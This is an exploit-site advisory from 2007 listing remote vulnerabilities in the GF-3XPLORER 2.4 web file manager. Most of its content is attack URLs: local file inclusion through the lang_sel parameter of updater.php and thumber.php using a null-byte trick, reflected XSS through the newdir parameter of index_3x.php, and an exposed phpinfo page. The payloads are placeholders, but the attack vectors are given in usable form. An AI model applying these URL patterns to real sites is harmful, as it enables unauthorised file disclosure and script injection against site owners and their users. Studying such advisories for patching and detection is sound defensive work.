[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : GF-3XPLORER 2.4 (XSS/LFI/Etc.) Multiple Remote Vulnerabilities
# Published : 2007-12-18
# Author : MhZ91
# Previous Title : Shadowed Portal <= 5.7d3 (POST) Remote File Inclusion Vulnerability
# Next Title : xeCMS 1.x (view.php list) Remote File Disclosure Vulnerability
---------------------------------------------------------------
____ __________ __ ____ __
/_ | ____ |_______ _____/ |_ /_ |/ |_
| |/ | | _(__ <_/ ___ __ ______ | __
| | | | |/ ___| | /_____/ | || |
|___|___| /__| /______ /___ >__| |___||__|
/______| / /
---------------------------------------------------------------
Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org
---------------------------------------------------------------
Local File Inclusion & Full Path Discolusure
---------------------------------------------------------------
# Author: MhZ91 nobody.91@hotmail.it
# Download script: http://sourceforge.net/projects/gf-3xplorer/
# magic_quotes_gpc = Off
# Exploit
# http://[site]/[path]/updater.php?lang_sel=[LFI]%00
# http://[site]/[path]/thumber.php?lang_sel=[LFI]%00
---------------------------------------------------------------
# Xss
# http://[site]/[path]/index_3x.php?newdir=">[Xss]
# And other more..
---------------------------------------------------------------
# phpinfo(); View
# http://[site]/GF-3XPLORER/explorer/phpinfo.php
---------------------------------------------------------------
# www.Syue.com [2007-12-18]